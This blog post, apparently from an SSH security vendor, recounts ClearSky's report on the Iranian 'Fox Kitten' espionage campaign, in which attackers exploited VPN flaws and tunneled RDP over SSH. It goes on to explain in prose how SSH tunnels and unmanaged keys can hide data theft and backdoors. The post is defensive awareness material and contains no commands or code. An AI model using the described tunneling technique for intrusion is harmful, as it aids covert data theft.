According to a ClearSky research report, a widespread Iranian offensive campaign, dubbed the “Fox Kitten Campaign”, unfolded during the last quarter of 2019. The campaign has been conducted in the last three years against dozens of companies and organizations in Israel and around the world. Though the campaign, the attackers succeeded in gaining access and persistent foothold in the networks of numerous companies and organizations from the IT, telecommunication, oil and gas, aviation, government, and security sectors around the world.
The research company estimates that the campaign is among Iran’s most continuous and comprehensive campaigns revealed until now. Aside from malware, the campaign enfolds an entire infrastructure dedicated to ensuring long-lasting capability to control and fully access the targets chosen by the Iranians. Although the revealed campaign was used as reconnaissance infrastructure, it can also be used as a platform for spreading and activating destructive malware.
According to the analysis, Fox Kitten’s objectives were to:
The campaign has used a range of tools, including some based on open-source code and some custom weapons.
The initial infection vector has been the exploitation of recently disclosed vulnerabilities in different VPN services such as Pulse Secure VPN, Fortinet VPN and Global Protect by Palo Alto Networks.
The researchers assess that “this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit ‘one-day’ vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”
Upon gaining foothold at the target, the attackers tried to maintain the access to the networks via a variety of communication tools, including opening Remote Desktop (RDP) links over SSH tunneling, in order to camouflage and encrypt the communication with the targets. They also installed a set of remote access and communication tools and tools designed for privilege escalation along with several backdoors into the systems they have compromised.
The use of VPNs and RDP is savvy, the researchers noted: “The time needed to identify an attacker on a compromised network is long and varies between months to not at all. The existing monitoring capability for organizations to identify and block an attacker that entered through remote communication tools is difficult, to impossible.”
At the final stage, after successfully infiltrating the organization, the attackers “performed a routine process of identification, examination and filtering of sensitive, valuable information from every targeted organization,” according to the report. “The valuable information was sent back to the attackers for reconnaissance, espionage or further infection of connected networks.”
SSH tunneling is a method of transporting arbitrary networking data over an encrypted SSH connection. It can be used to add encryption to legacy applications. It can also be used to implement VPNs and access intranet services across firewalls.
SSH is the standard used for secure remote logins and file transfers over untrusted networks. It also provides a way to secure the data traffic of any given application using port forwarding, basically tunneling any TCP/IP port over SSH. This means that the application data traffic is directed to flow inside an encrypted SSH connection so that it cannot be eavesdropped or intercepted while it is in transit. SSH tunneling enables adding network security to legacy applications that do not natively support encryption.
As useful as SSH tunneling is, it also creates risk that needs to be addressed by corporate IT security teams. SSH connections are protected with strong encryption. This makes their content invisible to most deployed network monitoring and traffic filtering solutions. This invisibility carries considerable risk potential if it is exploited for malicious purposes such as data exfiltration. Cybercriminals or malware could exploit SSH tunnels to hide their unauthorized communications, or to exfiltrate stolen data from the target network.
In an SSH tunneling attack, the attacker sets up a server outside the target network. Once the attacker is in the target system, for example by exploiting VPN vulnerabilities as in the Fox Kitten campaign, they connect to the external SSH server. Most organizations permit outgoing SSH connections, at least when they have servers in a public cloud. This SSH connection is set up with an option that enables TCP port forwarding from a port on the external server to an SSH port on a server in the internal network. Setting up this SSH tunnel requires a single one-line command on the inside, and it can easily be automated. Most firewalls offer little to no protection against it.
Combined with attacks based on unmanaged SSH keys, SSH tunneling allows an attacker to hide data exfiltration and command channels. Additionally, improper managed SSH keys can be leveraged by attackers to penetrate the IT infrastructure and move freely across a network without detection. The compromise of one private key or installation of a public key can be leveraged to setup hard-to-notice backdoors, bypass privileged access control solutions and to perpetrate large-scale attacks and data breaches.
Improper SSH deployment (ie allowing tunneling, usage of vulnerable protocol) and key management can and will create significant vulnerabilities, which have been identified in the NIST Interagency Report 7966 (NISTIR 7966) “Security of Interactive and Automated Access Management Using Secure Shell (SSH)”
Since SSH is the primary secure access method used for administration and automated processes on mission critical systems, its security is crucial. The privileges granted to users and automated processes via SSH are typically elevated privileges. SSH keys enable automated connections to resources such as production servers, databases, routers, firewalls, disaster recovery systems, financial data, payment systems, intellectual property and patient information.
In many cases, users have been able to create and install keys without oversight and controls. This has led to violations of corporate access policies and dangerous backdoors which in turn facilitate the launch of successful attacks through the otherwise trusted encrypted tunnels.
Information security starts from controlling who is given access to systems, data and through which channels. If there is no control over access or the methods, there is no security, no confidentiality, no integrity, and no guarantees of continued operation.
How well is your organization monitoring and protecting your SSH deployment and keys?